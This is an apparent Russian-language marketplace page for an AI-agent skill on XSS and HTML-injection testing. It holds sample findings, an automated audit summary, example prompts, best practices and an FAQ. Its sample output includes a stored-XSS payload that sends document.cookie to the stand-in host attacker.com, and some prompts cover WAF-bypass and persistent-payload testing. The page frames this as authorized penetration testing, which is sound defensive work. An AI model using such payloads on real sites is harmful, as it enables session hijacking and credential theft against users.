Навыки xss-html-injection
📦
xss-html-injection
Безопасно ⚡
Содержит скрипты⚙️
Внешние команды🌐
Доступ к сети📁
Доступ к файловой системе
Тестирование на уязвимости XSS и HTML-инъекций
Веб-приложения часто содержат уязвимости межсайтового скриптинга и HTML-инъекций, которые злоумышленники используют для кражи сессий и учетных данных. Этот навык предоставляет систематическую методологию обнаружения, эксплуатации и проверки уязвимостей клиентских инъекций в авторизованных оценках безопасности.
Поддерживает: Claude Codex Code(CC)
1
Скачать ZIP навыка
2
Загрузить в Claude
Перейдите в Settings → Capabilities → Skills → Upload skill
3
Включите и начните использовать
Протестировать
Использование «xss-html-injection». Тестирование параметра поиска на отраженный XSS
Ожидаемый результат:
- Уязвимость найдена: Отраженный XSS в параметре /search?q=
- Серьезность: Средняя
- Пейлоад: <img src=x onerror=alert(document.domain)>
- Контекст: HTML body - не кодированное отражение
- Рекомендация: Реализовать выходное кодирование для всех пользовательских данных
Использование «xss-html-injection». Тестирование поля bio в профиле пользователя на хранимый XSS
Ожидаемый результат:
- Уязвимость найдена: Хранимый XSS в bio профиля пользователя
- Серьезность: Высокая (сохраняется, влияет на всех пользователей)
- Пейлоад: <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
- Воздействие: Перехват сессии всех пользователей, просматривающих профиль
- Рекомендация: Реализовать строгую валидацию ввода и выходное кодирование
Аудит безопасности
Безопасноv1 • 2/25/2026
This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.
1
Просканировано файлов
505
Проанализировано строк
5
находки
1
Всего аудитов
Проблемы низкого риска (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.
Факторы риска
⚡ Содержит скрипты (7)
⚙️ Внешние команды (64)
SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498
🌐 Доступ к сети (27)
SKILL.md:136 SKILL.md:382 SKILL.md:124 SKILL.md:130 SKILL.md:136 SKILL.md:145 SKILL.md:160 SKILL.md:163 SKILL.md:166 SKILL.md:169 SKILL.md:223 SKILL.md:226 SKILL.md:230 SKILL.md:246 SKILL.md:253 SKILL.md:254 SKILL.md:258 SKILL.md:375 SKILL.md:382 SKILL.md:434 SKILL.md:446 SKILL.md:451 SKILL.md:456 SKILL.md:456 SKILL.md:472 SKILL.md:483 SKILL.md:488
📁 Доступ к файловой системе (1)
Обнаруженные паттерны
Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
Проверено: claude
Оценка качества
38
Архитектура
100
Сопровождаемость
87
Контент
21
Сообщество
100
Безопасность
87
Соответствие спецификации
Что вы можете построить
Консультант по безопасности тестирует веб-приложения
Проводить авторизованные пентесты для выявления уязвимостей XSS в клиентских веб-приложениях и предоставлять рекомендации по устранению.
Разработчик проверяет обработку ввода
Тестировать пользовательские веб-приложения во время разработки для проверки правильной очистки ввода и реализованного выходного кодирования.
QA-инженер выполняет регрессионное тестирование безопасности
Включать тестирование XSS и HTML-инъекций в наборы регрессионных тестов безопасности для обнаружения уязвимостей до развертывания в production.
Попробуйте эти промпты
Базовая детекция XSS
Использовать навык XSS HTML-инъекции для тестирования формы входа на https://example.com на наличие отраженных уязвимостей XSS. Определить все поля ввода и протестировать базовые XSS-пейлоады.
Оценка хранимого XSS
Использовать навык XSS HTML-инъекции для тестирования раздела комментариев на наличие хранимого XSS. Создать тестовые пейлоады, которые сохраняются и выполняются при просмотре другими пользователями.
Обнаружение DOM-based XSS
Использовать навык XSS HTML-инъекции для анализа JavaScript на https://example.com/dashboard на наличие DOM-based XSS. Проверить обработку location.hash и location.search.
Валидация обхода фильтров
Использовать навык XSS HTML-инъекции для тестирования WAF на https://example.com на блокировку распространенных XSS-пейлоадов. Попробовать обход с помощью HTML-кодирования, Unicode-кодирования и вариаций тегов.
Лучшие практики
- Всегда получайте письменное разрешение перед тестированием любого целевого приложения
- Используйте контролируемые демонстрационные пейлоады, которые не сохраняются и не распространяются на непреднамеренных пользователей
- Немедленно сообщайте о критических уязвимостях через надлежащие каналы реагирования на инциденты
Избегать
- Тестирование production-систем без явного письменного разрешения
- Использование обнаруженных уязвимостей для несанкционированного доступа или эксфильтрации данных
- Развертывание пейлоадов, которые могут вызвать отказ в обслуживании или повреждение системы
Часто задаваемые вопросы
Выполняет ли этот навык реальные атаки на целевые веб-сайты?
Нет. Этот навык предоставляет методологию и пейлоады для авторизованного тестирования безопасности. Пользователи должны иметь явное письменное разрешение перед тестированием любой системы.
Может ли этот навык тестировать все типы XSS?
Навык охватывает хранимый, отраженный и DOM-based XSS. Однако некоторые продвинутые варианты, такие как мутационный XSS, могут потребовать дополнительных специализированных методов.
Какое разрешение требуется перед использованием этого навыка?
Требуется письменное разрешение от владельца системы. Оно должно включать определенную область применения, разрешенные методы тестирования и процедуры обработки любых захваченных данных.
Работает ли этот навык против приложений с CSP?
CSP может заблокировать многие XSS-пейлоады. Навык включает методы тестирования обхода CSP, но некоторые правильно настроенные политики CSP могут предотвратить успешную эксплуатацию.
Можно ли всегда украсть сессионные cookies через XSS?
Нет. Cookies с флагом HttpOnly недоступны через JavaScript. Современные приложения должны использовать эту защиту для сессионных cookies.
Что делать, если найдена критическая уязвимость XSS?
Немедленно сообщите через надлежащие каналы в соответствии с вашим соглашением об авторизации. Документируйте находку с доказательством концепции и предоставьте рекомендации по устранению владельцу.
Сведения для разработчиков
Автор
sickn33Лицензия
MIT
Репозиторий
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/xss-html-injectionСсылка
main
Структура файлов
📄 SKILL.md